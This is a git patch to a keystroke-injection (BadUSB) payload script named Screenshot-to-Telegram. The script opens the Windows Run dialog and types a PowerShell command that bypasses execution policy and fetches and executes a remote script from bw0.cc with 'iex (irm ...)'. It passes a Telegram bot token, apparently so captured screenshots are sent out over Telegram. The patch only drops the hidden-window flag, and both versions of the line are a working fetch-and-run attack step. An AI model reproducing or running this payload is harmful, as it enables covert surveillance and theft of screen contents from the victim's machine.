From c998a52cca0639bde9b6c20a88495c2226f6a184 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 11:04:56 +0000 Subject: [PATCH] Update Screenshot-to-Telegram.txt --- Screen-to-Telegram/Screenshot-to-Telegram.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Screen-to-Telegram/Screenshot-to-Telegram.txt b/Screen-to-Telegram/Screenshot-to-Telegram.txt index 2e590c1..0155501 100644 --- a/Screen-to-Telegram/Screenshot-to-Telegram.txt +++ b/Screen-to-Telegram/Screenshot-to-Telegram.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; iex (irm bw0.cc/tgscr) +STRING powershell -Ep Bypass -C $tg='TELEGRAM_TOKEN_HERE'; iex (irm bw0.cc/tgscr) ENTER